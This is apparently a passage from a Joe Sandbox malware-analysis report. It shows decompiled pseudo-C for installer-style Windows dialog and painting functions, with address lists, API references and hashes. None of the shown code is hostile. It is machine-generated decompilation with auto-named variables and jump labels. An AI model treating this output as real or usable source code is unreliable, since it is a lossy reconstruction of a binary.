                                                											}
                                                											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                										}
                                                										_v24 = _v24 + 1;
                                                										_t292 =  &(_t292[0x206]);
                                                									} while (_v24 <  *0x434f2c);
                                                									goto L86;
                                                								} else {
                                                									_t293 = E004012E2( *0x42d260);
                                                									E00401299(_t293);
                                                									_t222 = 0;
                                                									_t301 = 0;
                                                									if(_t293 <= 0) {
                                                										L74:
                                                										SendMessageW(_v12, 0x14e, _t301, 0);
                                                										_a16 = _t293;
                                                										_a8 = 0x420;
                                                										goto L75;
                                                									} else {
                                                										goto L71;
                                                									}
                                                									do {
                                                										L71:
                                                										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                											_t301 = _t301 + 1;
                                                										}
                                                										_t222 = _t222 + 1;
                                                									} while (_t222 < _t293);
                                                									goto L74;
                                                								}
                                                							}
                                                						}
                                                						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                							goto L93;
                                                						} else {
                                                							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                							if(_t232 == 0xffffffff) {
                                                								goto L93;
                                                							}
                                                							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                								_t294 = 0x20;
                                                							}
                                                							E00401299(_t294);
                                                							SendMessageW(_a4, 0x420, 0, _t294);
                                                							_a12 = _a12 | 0xffffffff;
                                                							_a16 = 0;
                                                							_a8 = 0x40f;
                                                							goto L56;
                                                						}
                                                					}
                                                				} else {
                                                					_v36 = 0;
                                                					_v20 = 2;
                                                					 *0x434f60 = _t291;
                                                					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                					_t297 = _t258;
                                                					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                					 *0x42d24c = _t260;
                                                					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                					}
                                                					DeleteObject(_t297);
                                                					_t298 = 0;
                                                					do {
                                                						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                							if(_t298 != 0x20) {
                                                								_v20 = 0;
                                                							}
                                                							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                						}
                                                						_t298 = _t298 + 1;
                                                					} while (_t298 < 0x21);
                                                					_t299 = _a16;
                                                					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                					_push(0x15);
                                                					E00404499(_a4);
                                                					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                					_push(0x16);
                                                					E00404499(_a4);
                                                					_t300 = 0;
                                                					_v16 = 0;
                                                					if( *0x434f2c <= 0) {
                                                						L19:
                                                						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                						goto L20;
                                                					} else {
                                                						_t319 = _v24 + 8;
                                                						_v32 = _t319;
                                                						do {
                                                							_t278 =  &(_t319[0x10]);
                                                							if( *_t278 != 0) {
                                                								_v64 = _t278;
                                                								_t279 =  *_t319;
                                                								_v88 = _v16;
                                                								_t311 = 0x20;
                                                								_v84 = 0xffff0002;
                                                								_v80 = 0xd;
                                                								_v68 = _t311;
                                                								_v44 = _t300;
                                                								_v72 = _t279 & _t311;
                                                								if((_t279 & 0x00000002) == 0) {
                                                									if((_t279 & 0x00000004) == 0) {
                                                										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									} else {
                                                										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                									}
                                                								} else {
                                                									_v80 = 0x4d;
                                                									_v48 = 1;
                                                									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                									_v36 = 1;
                                                									 *( *0x42d260 + _t300 * 4) = _t284;
                                                									_v16 =  *( *0x42d260 + _t300 * 4);
                                                								}
                                                							}
                                                							_t300 = _t300 + 1;
                                                							_t319 =  &(_v32[0x818]);
                                                							_v32 = _t319;
                                                						} while (_t300 <  *0x434f2c);
                                                						if(_v36 != 0) {
                                                							L20:
                                                							if(_v20 != 0) {
                                                								E004044CE(_v8);
                                                								goto L23;
                                                							} else {
                                                								ShowWindow(_v12, 5);
                                                								E004044CE(_v12);
                                                								L93:
                                                								return E00404500(_a8, _a12, _a16);
                                                							}
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                			}


























































                                                0x00404f0d
                                                0x00404f26
                                                0x00404f2b
                                                0x00404f33
                                                0x00404f39
                                                0x00404f4f
                                                0x00404f52
                                                0x0040517d
                                                0x00405184
                                                0x00405198
                                                0x00405186
                                                0x00405188
                                                0x0040518b
                                                0x0040518c
                                                0x00405193
                                                0x00405193
                                                0x004051a4
                                                0x004051b2
                                                0x004051b5
                                                0x004051cb
                                                0x00405240
                                                0x00405243
                                                0x00405245
                                                0x0040524f
                                                0x0040525d
                                                0x0040525d
                                                0x0040525f
                                                0x00405269
                                                0x0040526f
                                                0x00405272
                                                0x00405275
                                                0x00405290
                                                0x00405277
                                                0x00405281
                                                0x00405281
                                                0x00405275
                                                0x00405269
                                                0x00000000
                                                0x00405243
                                                0x004051d0
                                                0x004051db
                                                0x004051e0
                                                0x004051e7
                                                0x004051ec
                                                0x004051f0
                                                0x004051fb
                                                0x004051fb
                                                0x004051ff
                                                0x00405203
                                                0x00405207
                                                0x0040521a
                                                0x00405209
                                                0x00405209
                                                0x00405210
                                                0x00405216
                                                0x00405212
                                                0x00405212
                                                0x00405212
                                                0x00405210
                                                0x0040521e
                                                0x00405220
                                                0x00405233
                                                0x00405236
                                                0x00405239
                                                0x00405239
                                                0x00405203
                                                0x00000000
                                                0x004051f0
                                                0x004051d2
                                                0x004051d9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405293
                                                0x00405293
                                                0x0040529a
                                                0x0040530b
                                                0x00405313
                                                0x0040531b
                                                0x0040531b
                                                0x00405324
                                                0x00405326
                                                0x0040532d
                                                0x00405330
                                                0x00405330
                                                0x00405336
                                                0x0040533d
                                                0x00405340
                                                0x00405340
                                                0x00405346
                                                0x0040534c
                                                0x00405352
                                                0x00405352
                                                0x0040535f
                                                0x004054c0
                                                0x004054c7
                                                0x004054e4
                                                0x004054ea
                                                0x004054fc
                                                0x004054fc
                                                0x00000000
                                                0x00405365
                                                0x00405367
                                                0x0040536c
                                                0x00405371
                                                0x00405376
                                                0x00405378
                                                0x00405378
                                                0x00405379
                                                0x0040537a
                                                0x0040537c
                                                0x0040537c
                                                0x00405384
                                                0x004053c5
                                                0x004053c7
                                                0x004053d7
                                                0x004053da
                                                0x004053df
                                                0x004053e6
                                                0x004053e9
                                                0x0040548b
                                                0x00405494
                                                0x0040549c
                                                0x0040549c
                                                0x004054aa
                                                0x004054bb
                                                0x004054bb
                                                0x00000000
                                                0x004054aa
                                                0x004053ef
                                                0x004053f2
                                                0x004053f8
                                                0x004053fd
                                                0x004053ff
                                                0x00405401
                                                0x00405407
                                                0x0040540e
                                                0x00405413
                                                0x0040541a
                                                0x0040541d
                                                0x0040541d
                                                0x00405424
                                                0x00405430
                                                0x00405434
                                                0x00405436
                                                0x00405436
                                                0x00405426
                                                0x00405428
                                                0x00405428
                                                0x00405456
                                                0x00405462
                                                0x00405471
                                                0x00405471
                                                0x00405473
                                                0x00405476
                                                0x0040547f
                                                0x00000000
                                                0x00405386
                                                0x00405391
                                                0x00405394
                                                0x00405399
                                                0x0040539b
                                                0x0040539f
                                                0x004053af
                                                0x004053b9
                                                0x004053bb
                                                0x004053be
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004053a1
                                                0x004053a1
                                                0x004053a7
                                                0x004053a9
                                                0x004053a9
                                                0x004053aa
                                                0x004053ab
                                                0x00000000
                                                0x004053a1
                                                0x00405384
                                                0x0040535f
                                                0x004052a2
                                                0x00000000
                                                0x004052b8
                                                0x004052c2
                                                0x004052c7
                                                0x00000000
                                                0x00000000
                                                0x004052d9
                                                0x004052de
                                                0x004052ea
                                                0x004052ea
                                                0x004052ec
                                                0x004052fb
                                                0x004052fd
                                                0x00405301
                                                0x00405304
                                                0x00000000
                                                0x00405304
                                                0x004052a2
                                                0x00404f58
                                                0x00404f5d
                                                0x00404f66
                                                0x00404f6d
                                                0x00404f7f
                                                0x00404f8a
                                                0x00404f90
                                                0x00404f9e
                                                0x00404fb2
                                                0x00404fb7
                                                0x00404fc4
                                                0x00404fc9
                                                0x00404fdf
                                                0x00404ff0
                                                0x00404ffd
                                                0x00404ffd
                                                0x00405000
                                                0x00405006
                                                0x00405008
                                                0x0040500b
                                                0x00405010
                                                0x00405015
                                                0x00405017
                                                0x00405017
                                                0x00405037
                                                0x00405037
                                                0x00405039
                                                0x0040503a
                                                0x0040503f
                                                0x00405045
                                                0x00405049
                                                0x0040504e
                                                0x00405056
                                                0x0040505a
                                                0x0040505f
                                                0x00405064
                                                0x0040506c
                                                0x0040506f
                                                0x0040513f
                                                0x00405152
                                                0x00000000
                                                0x00405075
                                                0x00405078
                                                0x0040507b
                                                0x0040507e
                                                0x0040507e
                                                0x00405084
                                                0x0040508d
                                                0x00405090
                                                0x00405094
                                                0x00405097
                                                0x0040509a
                                                0x004050a3
                                                0x004050ac
                                                0x004050af
                                                0x004050b2
                                                0x004050b5
                                                0x004050f3
                                                0x0040511e
                                                0x004050f5
                                                0x00405104
                                                0x00405104
                                                0x004050b7
                                                0x004050ba
                                                0x004050c8
                                                0x004050d2
                                                0x004050da
                                                0x004050e1
                                                0x004050ec
                                                0x004050ec
                                                0x004050b5
                                                0x00405124
                                                0x00405125
                                                0x00405131
                                                0x00405131
                                                0x0040513d
                                                0x00405158
                                                0x0040515b
                                                0x00405178
                                                0x00000000
                                                0x0040515d
                                                0x00405162
                                                0x0040516b
                                                0x004054fe
                                                0x00405510
                                                0x00405510
                                                0x0040515b
                                                0x00000000
                                                0x0040513d
                                                0x0040506f

                                                APIs
                                                • GetDlgItem.USER32 ref: 00404F1E
                                                • GetDlgItem.USER32 ref: 00404F29
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                • LoadImageW.USER32 ref: 00404F8A
                                                • SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                • DeleteObject.GDI32(00000000), ref: 00405000
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
                                                • ShowWindow.USER32(?,00000005), ref: 00405162
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                • GlobalFree.KERNEL32 ref: 00405340
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                • GetDlgItem.USER32 ref: 004054F5
                                                • ShowWindow.USER32(00000000), ref: 004054FC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 2564846305-813528018
                                                • Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
                                                • Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
                                                • Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                				intOrPtr _v8;
                                                				int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t56;
                                                				intOrPtr _t69;
                                                				signed int _t75;
                                                				signed short* _t76;
                                                				signed short* _t78;
                                                				long _t92;
                                                				int _t103;
                                                				signed int _t110;
                                                				intOrPtr _t113;
                                                				WCHAR* _t114;
                                                				signed int* _t116;
                                                				WCHAR* _t117;
                                                				struct HWND__* _t118;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L13:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x42b234 =  *0x42b234 + 1;
                                                							}
                                                							L27:
                                                							_t114 = _a16;
                                                							L28:
                                                							return E00404500(_a8, _a12, _t114);
                                                						}
                                                						_t56 = GetDlgItem(_a4, 0x3e8);
                                                						_t114 = _a16;
                                                						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                							_v12 = _t103;
                                                							_v16 = _t113;
                                                							_v8 = 0x432ea0;
                                                							if(_t103 - _t113 < 0x800) {
                                                								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorW(0, 0x7f02));
                                                								_push(1);
                                                								E00404907(_a4, _v8);
                                                								SetCursor(LoadCursorW(0, 0x7f00));
                                                								_t114 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                							goto L28;
                                                						} else {
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                								SendMessageW( *0x434f08, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                								SendMessageW( *0x434f08, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
                                                						goto L27;
                                                					} else {
                                                						_t69 =  *0x42c240; // 0x71af4c
                                                						_t29 = _t69 + 0x14; // 0x71af60
                                                						_t116 = _t29;
                                                						if(( *_t116 & 0x00000020) == 0) {
                                                							goto L27;
                                                						}
                                                						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E004048E3();
                                                						goto L13;
                                                					}
                                                				}
                                                				_t117 = _a16;
                                                				_t75 =  *(_t117 + 0x30);
                                                				if(_t75 < 0) {
                                                					_t75 =  *( *0x433edc - 4 + _t75 * 4);
                                                				}
                                                				_t76 =  *0x434f38 + _t75 * 2;
                                                				_t110 =  *_t76 & 0x0000ffff;
                                                				_a8 = _t110;
                                                				_t78 =  &(_t76[1]);
                                                				_a16 = _t78;
                                                				_v16 = _t78;
                                                				_v12 = 0;
                                                				_v8 = E00404609;
                                                				if(_t110 != 2) {
                                                					_v8 = E004045CF;
                                                				}
                                                				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                				_push(0x22);
                                                				E00404499(_a4);
                                                				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                				_push(0x23);
                                                				E00404499(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                				_t118 = GetDlgItem(_a4, 0x3e8);
                                                				E004044CE(_t118);
                                                				SendMessageW(_t118, 0x45b, 1, 0);
                                                				_t92 =  *( *0x434f10 + 0x68);
                                                				if(_t92 < 0) {
                                                					_t92 = GetSysColor( ~_t92);
                                                				}
                                                				SendMessageW(_t118, 0x443, 0, _t92);
                                                				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                				 *0x42b234 = 0;
                                                				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                				 *0x42b234 = 0;
                                                				return 0;
                                                			}



















                                                0x0040466a
                                                0x00404797
                                                0x004047f4
                                                0x004047f8
                                                0x004048c5
                                                0x004048c7
                                                0x004048c7
                                                0x004048cd
                                                0x004048cd
                                                0x004048d0
                                                0x00000000
                                                0x004048d7
                                                0x00404806
                                                0x0040480c
                                                0x00404816
                                                0x00404821
                                                0x00404824
                                                0x00404827
                                                0x00404832
                                                0x00404835
                                                0x0040483c
                                                0x00404849
                                                0x0040485a
                                                0x00404860
                                                0x00404868
                                                0x00404876
                                                0x0040487c
                                                0x0040487c
                                                0x0040483c
                                                0x00404886
                                                0x00000000
                                                0x00404891
                                                0x00404895
                                                0x004048a5
                                                0x004048a5
                                                0x004048ab
                                                0x004048b7
                                                0x004048b7
                                                0x00000000
                                                0x004048bb
                                                0x00404886
                                                0x004047a2
                                                0x00000000
                                                0x004047b4
                                                0x004047b4
                                                0x004047b9
                                                0x004047b9
                                                0x004047bf
                                                0x00000000
                                                0x00000000
                                                0x004047e8
                                                0x004047ea
                                                0x004047ef
                                                0x00000000
                                                0x004047ef
                                                0x004047a2
                                                0x00404670
                                                0x00404673
                                                0x00404678
                                                0x00404689
                                                0x00404689
                                                0x00404691
                                                0x00404694
                                                0x00404698
                                                0x0040469b
                                                0x0040469f
                                                0x004046a2
                                                0x004046a5
                                                0x004046a8
                                                0x004046af
                                                0x004046b1
                                                0x004046b1
                                                0x004046bb
                                                0x004046c8
                                                0x004046d2
                                                0x004046d7
                                                0x004046da
                                                0x004046df
                                                0x004046f6
                                                0x004046fd
                                                0x00404710
                                                0x00404713
                                                0x00404727
                                                0x0040472e
                                                0x00404733
                                                0x00404738
                                                0x00404738
                                                0x00404746
                                                0x00404754
                                                0x00404766
                                                0x0040476b
                                                0x0040477b
                                                0x0040477d
                                                0x00000000

                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
                                                • GetDlgItem.USER32 ref: 0040470A
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
                                                • GetSysColor.USER32(?), ref: 00404738
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
                                                • lstrlenW.KERNEL32(?), ref: 00404759
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
                                                • GetDlgItem.USER32 ref: 004047D4
                                                • SendMessageW.USER32(00000000), ref: 004047DB
                                                • GetDlgItem.USER32 ref: 00404806
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404857
                                                • SetCursor.USER32(00000000), ref: 0040485A
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00404873
                                                • SetCursor.USER32(00000000), ref: 00404876
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
                                                • Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
                                                • Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x434f10;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
                                                				}
                                                				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                			}













                                                0x0040100a
                                                0x00401039
                                                0x00401047
                                                0x0040104d
                                                0x00401051
                                                0x0040105b
                                                0x00401061
                                                0x00401064
                                                0x004010f3
                                                0x00401089
                                                0x0040108c
                                                0x004010a6
                                                0x004010bd
                                                0x004010cc
                                                0x004010cf
                                                0x004010d5
                                                0x004010d9
                                                0x004010e4
                                                0x004010ed
                                                0x004010ef
                                                0x004010ef
                                                0x00401100
                                                0x00401105
                                                0x0040110d
                                                0x00401110
                                                0x00401112
                                                0x00401118
                                                0x0040111f
                                                0x00401126
                                                0x00401130
                                                0x00401142
                                                0x00401156
                                                0x00401160
                                                0x00401165
                                                0x00401165
                                                0x00401110
                                                0x0040116e
                                                0x00000000
                                                0x00401178
                                                0x00401010
                                                0x00401013
                                                0x00401015
                                                0x0040101f
                                                0x0040101f
                                                0x00000000

                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
